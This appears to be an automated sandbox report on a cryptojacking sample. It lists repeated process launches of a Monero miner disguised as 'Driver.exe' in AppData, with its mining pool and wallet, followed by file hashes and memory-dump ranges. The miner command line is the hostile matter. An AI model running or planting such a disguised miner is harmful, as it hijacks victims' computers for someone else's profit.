"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

Network

N/A

Files

memory/856-54-0x0000000000C70000-0x000000000106E000-memory.dmp

memory/856-55-0x0000000075D01000-0x0000000075D03000-memory.dmp

\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1496-57-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1496-59-0x00000000001F0000-0x0000000000204000-memory.dmp

memory/856-60-0x0000000006340000-0x0000000006EB5000-memory.dmp

memory/1496-61-0x0000000140000000-0x0000000140B75000-memory.dmp

memory/1708-62-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1708-65-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1420-66-0x0000000000000000-mapping.dmp

memory/1420-69-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1072-70-0x0000000000000000-mapping.dmp

memory/1072-73-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/928-74-0x0000000000000000-mapping.dmp

memory/928-77-0x0000000140000000-0x0000000140B75000-memory.dmp

memory/1420-78-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1420-81-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1192-82-0x0000000000000000-mapping.dmp

memory/1192-85-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/988-86-0x0000000000000000-mapping.dmp

memory/988-89-0x0000000140000000-0x0000000140B75000-memory.dmp

memory/952-90-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/952-93-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1244-94-0x0000000000000000-mapping.dmp

memory/1244-97-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1648-98-0x0000000000000000-mapping.dmp

memory/856-102-0x0000000006340000-0x0000000006EB5000-memory.dmp

memory/1648-101-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
